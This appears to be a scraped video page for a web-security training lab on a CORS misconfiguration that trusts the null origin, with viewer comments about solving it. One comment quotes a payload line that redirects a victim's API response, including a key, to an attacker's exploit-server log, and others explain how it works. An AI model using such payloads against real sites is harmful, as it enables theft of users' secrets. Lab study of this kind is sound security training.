CORS vulnerability with trusted null origin (Video solution)
Рет қаралды 9,867
Күн бұрын
@jessicaginger1262 3 жыл бұрын
I captured request proxifying i got all the details but when i check for parameter over response its not showin Access-control-allow-origin where can we get scripts for pulling api not lookin in lab solutin
@abhishekcs5468 4 жыл бұрын
why did the location needed to be changed from "location='/log?key='+this.responseText;" to "location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);" ? Why do we need to specify the exploit server full url and also what is the need to encode in this challenge compared to the basic challenge?
@lorissimonetti2461 4 жыл бұрын
You need to specify the full URL of the exploit server, cuz (as shown at 3:28) you need the access log of the exploit server (located at exploit-server-url.com/log), if you don't the '/log' would be 'appended' to the victim URL(so the lab URL). I think you can even use an external server like the burp collaborator to receive the request, and so in this case $exploit-server-url would be equal to the burp-collaborator payload URL.
@lorissimonetti2461 4 жыл бұрын
btw I solved the lab without any encoding.
@abhishekcs5468 4 жыл бұрын
@@lorissimonetti2461 Thank you, for the explanation!
@cyberverse8728 5 жыл бұрын
From where to Get the Payload script?
@mallandajimmy4493 4 жыл бұрын
its in the solution section
Michael Sommer
Рет қаралды 6 М.
Двое играют | Наташа и Вова
Рет қаралды 23 МЛН
Fabiosa Best Lifehacks
Рет қаралды 9 МЛН
Kate Brush
Рет қаралды 30 МЛН
Rana Khalil
Рет қаралды 12 М.
Michael Sommer
Рет қаралды 8 М.
Cyberw1ng
Рет қаралды 94
CyberWorldSec
Рет қаралды 1,1 М.
Двое играют | Наташа и Вова
Рет қаралды 23 МЛН